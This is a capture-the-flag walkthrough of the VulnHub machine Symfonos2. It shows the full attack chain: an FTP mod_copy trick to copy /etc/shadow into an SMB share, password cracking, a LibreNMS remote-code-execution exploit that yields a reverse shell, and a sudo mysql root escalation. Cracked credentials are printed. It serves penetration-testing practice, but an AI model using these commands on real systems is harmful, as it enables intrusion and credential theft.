VulnHub Symfonos2
29 May, 2021
Machine Link: https://www.vulnhub.com/entry/symfonos-2,331/
Beginning with an nmap scan
$ sudo nmap -A -sC -sV -O -p 1-20000 192.168.56.120
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.120
Host is up (0.0011s latency).
Not shown: 19995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:5B:FA:39 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 7h09m58s, deviation: 2h53m12s, median: 5h29m58s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2021-05-28T05:21:34-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-28T10:21:34
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms 192.168.56.120
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.22 seconds
I started with smb, here's some output from enum4linux
===========================================
| Share Enumeration on 192.168.56.120 |
===========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 192.168.56.120
//192.168.56.120/print$ Mapping: DENIED, Listing: N/A
//192.168.56.120/anonymous Mapping: OK, Listing: OK
//192.168.56.120/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aeolus (Local User)
S-1-22-1-1001 Unix User\cronus (Local User)
Using smbclient
# smbclient --no-pass //192.168.56.120/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 10:30:09 2019
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
19728000 blocks of size 1024. 16314080 blocks available
smb: \> cd backups
smb: \backups\> ls
. D 0 Thu Jul 18 10:25:17 2019
.. D 0 Thu Jul 18 10:30:09 2019
log.txt N 11394 Thu Jul 18 10:25:16 2019
19728000 blocks of size 1024. 16314080 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (397.4 KiloBytes/sec) (average 397.4 KiloBytes/sec)
log.txt was pretty long, here are the noticeable bits that I found
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
When I tried anonymous login on FTP, it said
# ftp 192.168.56.120
Connected to 192.168.56.120.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.120]
Name (192.168.56.120:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
The website was another dead end, just like Symfonos 1, it had only an image.
So by this point I thought I had gathered all possible information from the available ports and was stuck. I found out that since it was already known that the backup of /etc/shadow was /var/backups/shadow.bak, and /home/aeolus/share was readable through SMB, I could copy the latter file to the share and read it. What I wasn't aware of was the fact that even though I didn't know the FTP password, I could still move around files on the system, specifically using the site FTP command
# ftp 192.168.56.120
ftp> site cpfr /var/backups/shadow.bak
350 File or directory exists, ready for destination name
ftp> site cpto /home/aeolus/share/shadow.bak
250 Copy successful
# smbclient --no-pass //192.168.56.120/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri May 28 14:31:57 2021
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
shadow.bak N 1173 Fri May 28 14:31:57 2021
19728000 blocks of size 1024. 16312084 blocks available
smb: \> get shadow.bak
getting file \shadow.bak of size 1173 as shadow.bak (190.9 KiloBytes/sec) (average 190.9 KiloBytes/sec)
# cat shadow.bak
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
daemon:*:18095:0:99999:7:::
bin:*:18095:0:99999:7:::
sys:*:18095:0:99999:7:::
sync:*:18095:0:99999:7:::
games:*:18095:0:99999:7:::
man:*:18095:0:99999:7:::
lp:*:18095:0:99999:7:::
mail:*:18095:0:99999:7:::
news:*:18095:0:99999:7:::
uucp:*:18095:0:99999:7:::
proxy:*:18095:0:99999:7:::
www-data:*:18095:0:99999:7:::
backup:*:18095:0:99999:7:::
list:*:18095:0:99999:7:::
irc:*:18095:0:99999:7:::
gnats:*:18095:0:99999:7:::
nobody:*:18095:0:99999:7:::
systemd-timesync:*:18095:0:99999:7:::
systemd-network:*:18095:0:99999:7:::
systemd-resolve:*:18095:0:99999:7:::
systemd-bus-proxy:*:18095:0:99999:7:::
_apt:*:18095:0:99999:7:::
Debian-exim:!:18095:0:99999:7:::
messagebus:*:18095:0:99999:7:::
sshd:*:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
mysql:!:18095:0:99999:7:::
Debian-snmp:!:18095:0:99999:7:::
librenms:!:18095::::::
# john pass --wordlist=rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sergioteamo (?)
Session completed
I was able to login as aeolus through SSH
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
aeolus@symfonos2:~$ whoami
aeolus
cronus is running apache listening on port 8080, serving librenms
cronus 2010 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2011 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2012 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2013 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
cronus 2014 0.0 1.3 410524 10472 ? S 06:25 0:00 /usr/sbin/apache2 -k start
aeolus@symfonos2:/etc/apache2$ cat ports.conf
# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf
Listen 127.0.0.1:8080
<IfModule ssl_module>
Listen 443
</IfModule>
<IfModule mod_gnutls.c>
Listen 443
</IfModule>
aeolus@symfonos2:~$ cd /etc/apache2/sites-enabled/
aeolus@symfonos2:/etc/apache2/sites-enabled$ ls
librenms.conf
aeolus@symfonos2:/etc/apache2/sites-enabled$ cat librenms.conf
<VirtualHost 127.0.0.1:8080>
DocumentRoot /opt/librenms/html/
ServerName localhost
AllowEncodedSlashes NoDecode
<Directory "/opt/librenms/html/">
Require all granted
AllowOverride All
Options FollowSymLinks MultiViews
</Directory>
</VirtualHost>
Since the website was listening only on localhost instead of 0.0.0.0, I had to use port forwarding to visit it. aeolus' credentials got me in. There are authenticated exploits available for librenms
$ searchsploit librenms
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
LibreNMS - addhost Command Injection (Metasploit) | linux/remote/46970.rb
LibreNMS - Collectd Command Injection (Metasploit) | linux/remote/47375.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution | php/webapps/47044.py
LibreNMS 1.46 - 'search' SQL Injection | multiple/webapps/48453.txt
LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection | multiple/webapps/49246.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
I tried the third one and was able to get a reverse shell as cronus
$ nc -vlnp 4242
listening on [any] 4242 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.120] 47542
/bin/sh: 0: can't access tty; job control turned off
$ whoami
cronus
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
Found database credentials being used by librenms
$config['db_user'] = 'librenms';
$config['db_pass'] = 'VLby8dGg4rvw33sg';
I couldn't find anything interesting in the database, the only user was aeolus
Apparently cronus was allowed to run mysql as sudo
cronus@symfonos2:/opt/librenms$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
cronus@symfonos2:/opt/librenms$ sudo /usr/bin/mysql
sudo /usr/bin/mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> system id
system id
uid=0(root) gid=0(root) groups=0(root)
MariaDB [(none)]> system /bin/bash
system /bin/bash
root@symfonos2:/opt/librenms# whoami
whoami
root
root@symfonos2:/opt/librenms# id
id
uid=0(root) gid=0(root) groups=0(root)
root@symfonos2:/opt/librenms# ls /root
ls /root
proof.txt
root@symfonos2:/opt/librenms# cd /root/
cd /root/
root@symfonos2:~# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback!